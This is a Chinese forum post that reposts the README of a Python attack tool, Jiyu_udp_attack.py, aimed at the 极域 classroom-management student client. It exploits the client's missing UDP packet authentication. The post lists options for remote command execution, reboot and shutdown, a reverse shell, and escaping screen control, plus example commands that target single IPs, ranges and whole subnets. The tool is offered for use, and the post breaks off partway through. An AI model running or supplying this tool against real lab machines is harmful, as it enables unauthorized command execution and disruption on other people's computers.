【团队图】

【声明】github搬来的，看凯特社区没有就发一下因为极域的学生端没有对接收到的udp包做(=・ω・=)身份验证，导致了我们可以构造特定的数据包让学生端来执行，从而实现命令执行攻击机房内上线的任意学生端机器。 运行环境 Python3版本说明v1.5 修复命令执行bugv1.4 代码重构，优化参数选取逻辑 反弹shell功能增加随机端口 更新文档v1.3 脱离/恢复屏幕控制 支持反弹shell v1.2 修复bugv1.1 -g 选项支持获取学生端监听的端口 v1.0 首次提交使用方法usage: -------------- Github Repositories ----------

[-h] -ip IP [-p P] [-msg MSG] [-c C] [-l L] [-t T] [-e {r,s,g,nc,break,continue}] {r,s,g,nc,break,continue} ... positional arguments: {r,s,g,nc,break,continue}-e 参数的详细说明r reboot 重启 s shutdown 关机 g 独立选项，获取当前的ip地址以及学生端监听的端口 nc 独立选项，反弹shell的机器需出网，退出可使用命令exitbreak 独立选项，脱离屏幕控制，需要管理员权限 continue 独立选项，恢复屏幕控制 optional arguments:-h, --help show this help message and exit-ip IP ip 指定目标IP地址-p P port 指定监听端口，默认端口为4705 -msg MSG send_message发送消息 eg: -msg "HelloWord!"-c C command命令 eg: -c "cmd.exe /c ipconfig"-l L 循环次数，默认为1 -t T 循环时间间隔，默认是22秒 -e {r,s,g,nc,break,continue} Extra Options加载额外的选项 eg：-e r使用例子Tips: 使用 -ip 参数指定目标IP时，可以有以下几种指定方式： 指定单个IP，如 192.168.80.12指定IP范围，如 192.168.80.10-56指定IP所在C段，如 192.168.80.1/24 1.获取内网ip地址及监听的端口，若学生端监听端口不是默认的4705，则在后续操作过程中需使用 -p 参数指定端口 python Jiyu_udp_attack.py -e g2.脱离屏幕控制 当前运行权限需为管理员权限，主要用于开启MpsSvc服务 python Jiyu_udp_attack.py -e break3.恢复屏幕控制python Jiyu_udp_attack.py -e continue 4.发送消息 若学生端监听端口为4705，向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息 python Jiyu_udp_attack.py -ip 192.168.80.12 -msg "hello,baby!"若学生端监听端口为4605，需使用 -p 参数指定端口，向IP地址为192.168.80.12的机器发送一条内容为"hello,baby!"的消息 python Jiyu_udp_attack.py -ip 192.168.80.12 -p 4605 -msg "hello,baby!"5.执行命令 给192.168.80.12到192.168.80.137弹一个计算器python Jiyu_udp_attack.py -ip 192.168.80.12-137 -c calc.exe 内容放不下了，发下个帖子里